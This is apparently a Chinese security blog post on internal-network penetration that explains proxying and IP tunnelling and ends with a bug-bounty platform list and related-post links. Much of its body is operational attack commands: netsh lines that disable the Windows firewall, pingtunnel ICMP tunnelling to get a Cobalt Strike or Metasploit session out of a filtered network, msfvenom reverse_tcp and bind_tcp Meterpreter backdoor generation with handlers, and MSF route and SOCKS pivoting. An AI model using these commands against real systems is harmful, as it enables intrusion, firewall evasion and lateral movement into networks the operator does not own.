前言:

介绍:

博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。


导读:

面向读者:对于网络安全方面的学者。

本文知识点(读者自测):

(1)基础知识、通讯、上线、代理(√)

让读者如虎添翼

内网博文 目标 状态
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件 学会cs的基本使用方法、以及插件 已发布
【内网安全-基础】基础知识、信息收集、工具 基础知识、基础常规信息收集(命令、工具等) 已发布
【内网安全-防火墙】防火墙、协议、策略 防护墙的基础知识、出入站策略等 已发布
【内网安全-通讯&上线】通讯&上线基础知识 基础知识、通讯、上线、代理 已发布
【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议 常用的上线方法 已发布
隧道搭建、穿透上线 2023将继续更新,敬请期待 ——
横向移动 2023将继续更新,敬请期待 ——
权限维持 2023将继续更新,敬请期待 ——
靶场练习 2023将继续更新,敬请期待 ——

目录

一、基础知识

1、关键词:

2、代理技术

3、IP隧道技术

4、使用场景

二、示例

1、不出网上线

1)理论:

2)示例:

三、代理技术

1、dome

2、第一步:网络通讯

3、第二步:控制上线

4、第三步:依次上线


一、基础知识

1、关键词:

连接方向:正向连接(主动)、反向连接(被动)

——

IP隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)

——

代理技术:解决网络通讯不通的问题(利用跳板机建立节点后继续操作)


2、代理技术

1)利用代理工具将内网的流量代理到本地进行访问,进而进行下一步渗透,同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。

————

2)代理的本质是Socks协议(防火墙安全会话转换协议),工作在OSI模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务

————

3)目前支持SOCKS4和SOCKS5版本:

SOCKS4:支持TELNET、FTP、HTTP等TCP协议

SOCKS5:支持TCP与UDP,并支持安全认证方案

————

4)代理分为正向代理和反向代理两类:

正向代理:已控服务器监听端口,通过这个端口形成一个正向的隧道,由代理机器代替主机去访问内网目标。但是内网入口一般处于DMZ区域有防火墙拦截,无法直接进入内网环境。

——

反向代理:由内网主机主动交出权限到代理机器,然后本地去连接形成反向代理(如VPS监听本地端口,已控内网服务器来连接此端口,形成一个隧道。如果内网设备连接外网,就无法回弹只能再想其他办法)

————

5)端口转发工具:NC、LCX、regGorg、venom、ngrock等
代理链工具:SocksCap、ProxyChains(Linux)、Proxifier(win)等


3、IP隧道技术

1)是路由器把一种网络层协议封装到另一个协议中以跨过网络传送到另一个路由器的处理过程

————

2)隧道技术是一种数据包封装技术,它是将原始IP包(其报头包含原始发送者和最终目的地)封装在另一个数据包(称为封装的IP包)的数据净荷中进行传输

————

3)隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道外,其他隧道技术大部分针对的出站策略绕过(也就是最终传输的地方会转会原本的协议)


4、使用场景

1)入站过滤上线:隧道技术(正向)、反向连接、关闭&删除&替换(防火墙策略)
——

2)出站过滤上线:隧道技术(反向)、正向连接、关闭&删除&替换(防火墙策略)
——

3)简单的内网环境:防火墙开关,删除规则,替换程序(域控没有设置组策略防火墙同步)

Windows防火墙命令:查看当前防火墙状态    netsh advfirewall show allprofiles
关闭防火墙           netsh advfirewall set allprofiles state off
开启防火墙           netsh advfirewall set allprofiles state on
恢复初始防火墙设置    netsh advfirewall reset
启用桌面防火墙        netsh advfirewall set allprofiles state on
设置默认输入和输出策略 netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound

二、示例

1、不出网上线

1)理论:

1、域控通过组策略设置防火墙规则同步后,域内用户主机被限制TCP出网(出站规则),通过入站取得SHELL权限后,需要对其进行上线控制

考虑:正向连接、IP隧道技术

————

2、若入站被限制

考虑:反向连接、IP隧道技术

————

协议的向下兼容(Tcp被禁,就测试ICMP协议)

————

ICMP协议项目:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

————

2)示例:

CS-ICMP 上线VPS:
./pingtunnel -type server
肉鸡:
管理器运行(ICMP程序)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1(此处,监听本地6666端口,并转发到指定ip的7777端口)CS:
监听器1:127.0.0.1 6666
监听器2:192.168.46.66 7777
生成监听器1的Stager后门肉鸡执行
MSF 上线生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exeMSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit Kali开启隧道:
./pingtunnel -type server
Win开启隧道 //将本地3333 icmp协议数据转发到指定ip的4444端口上
管理员运行(ICMP程序)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.46.66:4444 -tcp 1 -noprint 1 -nolog 1

三、代理技术

1、dome

适用的场景(不可直达)


2、第一步:网络通讯

MSF&CS(路由添加&节点建立)

代理协议:
SOCKS4/5
代理软件:
SocksCap Proxifier ProxyChains等//右边第一个出网,getshell
//右边第1、2个主机都是通过vm2网络通信(同一网段192.168.11.0)
//建立通讯MSF通讯
1、添加路由 限于MSF
查看路由信息
run autoroute -p
run post/multi/manage/autoroute
//添加指定路由(wm2的),1是接收的session编号
route add 192.168.11.0 255.255.255.0 1
2、Sock代理(全局)
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1115
run
启用代理软件配置Sock5代理CS通讯
命令:socks 59578
操作:代理转发-Socks代理

3、第二步:控制上线

MSF&CS(协议生成&正反连接)

//此处是允许入站,所以正向连接
//通过同一网段(wm2)通讯,并上线监听MSF控制上线(正向)
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129
set lport 3333
runCS控制上线(正向)
监听器:bind_tcp port
命令:connect ip port

4、第三步:依次上线

MSF控制上线(正向)
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe > bd2.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.22.131
set lport 4455
runCS控制上线(正向)
监听器:bind_tcp port
命令:connect ip port


网络安全三年之约

First year

掌握各种原理、不断打新的靶场

目标:edusrc、cnvd

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/


second year

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

目标:众测平台、企业src应急响应中心

众测平台 URL
漏洞盒子 漏洞盒子 | 互联网安全测试众测平台
火线安全平台 火线安全平台
漏洞银行 BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台
360漏洞众包响应平台 360漏洞云漏洞众包响应平台
补天平台(奇安信) 补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
春秋云测 首页
雷神众测(可信众测,安恒) 雷神众测 - BountyTeam
云众可信(启明星辰) 云众可信 - 互联网安全服务引领者
ALLSEC ALLSEC
360众测 360众测平台
看雪众测(物联网) https://ce.kanxue.com/
CNVD众测平台 网络安全众测平台
工控互联网安全测试平台 CNCERT工业互联网安全测试平台
慢雾(区块链) Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone
平安汇聚 http://isrc.pingan.com/homePage/index
互联网大厂 URL
阿里 https://asrc.alibaba.com/#/
腾讯 https://security.tencent.com/
百度 https://bsrc.baidu.com/v2/#/home
美团 https://security.meituan.com/#/home
360 https://security.360.cn/
网易 https://aq.163.com/
字节跳动 https://security.bytedance.com/
京东 https://security.jd.com/#/
新浪 http://sec.sina.com.cn/
微博 https://wsrc.weibo.com/
搜狗 http://sec.sogou.com/
金山办公 https://security.wps.cn/
有赞 https://src.youzan.com/

Third Year

学习最新的知识,建全自己的渗透体系

目标:参与护网(每一个男孩子心中的梦想)

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

【内网安全-通讯上线】通讯上线基础知识相关推荐

  1. 内网安全学习从入门到入狱-知识-内网基础知识

    内网安全学习从入门到入狱-知识-内网基础知识 文章目录 内网安全学习从入门到入狱-知识-内网基础知识 内网渗透基础 基本的名词介绍 工作组 域 活动目录(AD) DC 域控制器(DC) DNS域名服务 ...

  2. LeetCode 牛客网 C++ 算法 刷题必备基础知识

    LeetCode 牛客网 C++ 算法 刷题必备基础知识 {ignore} 文章目录 LeetCode 牛客网 C++ 算法 刷题必备基础知识 {ignore} main综合模板 数组排序库 字符串库 ...

  3. 内网安全学习从入门到入狱-知识-内网信息探测与收集

    内网安全学习从入门到入狱-知识-内网信息收集 内网信息收集-工作组和域内基本信息收集 内网安全学习从入门到入狱-知识-内网信息收集 0x01本机检查--先看看我是谁 查询并开启远程连接服务 0x02域 ...

  4. 内网渗透-cobaltstrike之cs上线获取shell

    cobaltstrike之cs上线获取shell 文章目录 cobaltstrike之cs上线获取shell 前言 一.什么是cobaltstrike 二.cs上线获取shell 1.环境搭建 CS安 ...

  5. 内网渗透 Metasploit(MSF)基础使用

    内网渗透 Metasploit(MSF)使用 1.认识 MSF ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安 ...

  6. eip协议通信_工业通讯 | EtherNET/IP协议基础知识(Part 3)||附视频讲解

    点击蓝字 关注我们 相关阅读: EtherNet/IP OSI参考模型及其物理层.数据链路层与网络层的功能特点: EtherNET/IP协议基础知识(Part 1)||附视频讲解 Encapsulat ...

  7. 内网安全学习从入门到入狱-知识-内网隧道技术小结

    文章目录 0x00 内网穿透技术 0x01 首先判断出网协议 0x02 各种协议隧道 网络层 ICMP隧道 Lcx 传输层 瑞士军刀:nc Powercat(powershell版的nc) 推荐:ne ...

  8. 学习网安需要了解的一些基础知识

    P1.基本概念 1.POC/EXP POC(proof of concept)常指一段漏洞验证代码:EXP(exploit)指利用系统漏洞进行攻击的动作 PoC是证明漏洞存在的,而 Exp 是利用这个 ...

  9. 工商管理学计算机应用基础题,计算机应用基础全国网考选择题库(计算机基础知识篇).pdf...

    计算机应用基础全国网考选择题库(计算机基础知识篇).pdf 1 2010 年计算机应用基础全国网考选择题库(计算机基础知识篇) (注计算机应用基础题库已变更,原教材附带蓝色光盘内选择题库不全.) 1. ...

  10. MQTT协议应用场景1: 外网手机客户端 与 内网树莓派3B 的通讯

    实验目的:将外网手机客户端发送的字符串 通过树莓派3B的串口输出 不了解MQTT协议的请参考:MQTT协议体验 Mosquitto安装和使用 不了解使用Python操作树莓派串口的请参考:Raspbe ...

最新文章

  1. 一分钟先生之拨云见日看绩效
  2. Java Servlet完全教程
  3. 非程序员如何使用 Git——版本控制你的生活
  4. prometheus连续查询_Grafana + Prometheus快速搭建监控平台
  5. python去重复元素_python 去除单个list中的重复元素
  6. LeetCode 1567. 乘积为正数的最长子数组长度
  7. PyQt5将ui文件编译为py文件的方法
  8. 浅谈 Redis 与 MySQL 的耦合性以及利用管道完成 MySQL 到 Redis 的高效迁移
  9. 机器学习之集成学习概述
  10. 统计图表类库--libchart使用简介
  11. C语言图形编程--俄罗斯方块制作(一)详解
  12. 使用layui实现表格制作
  13. ArcGIS利用DEM提取河流水系(附练习数据下载)
  14. 我的第一个Imx6ULL应用《百度图像识别》
  15. 正离子计算机扫描检测,扫描电子显微镜
  16. 多重重要性采样(MIS)与光线追踪技术
  17. 加班到凌晨三点?一张图看懂华为员工睡眠时间!!
  18. python求直角三角形个数的公式_Python3 欧拉计划 问题71-75
  19. ORACLE 全角数字转半角数字
  20. Soul一声响,你的意中人就来了

热门文章

  1. WIDS(无线入侵检测)
  2. 京东图书详情页定价获取
  3. firebug 四款插件
  4. linux服务器IP伪造,Linux服务器间同网段IP伪装端口映射
  5. 机器有了综合感官?新研究结合视觉和听觉进行情感预测 | 一周AI最火论文
  6. 【Arduino+ESP32专题】一起来读INA3221数据手册 1
  7. WordPress使用SQL语句批量替换失效的蓝奏云下载地址
  8. 荣耀60 SE参数配置
  9. react-router-middleware-plus开源啦 | 基于react-router v6的零成本式路由权限解决方案
  10. 喜欢计算机专业的理由英语,计算机专业的英文自我介绍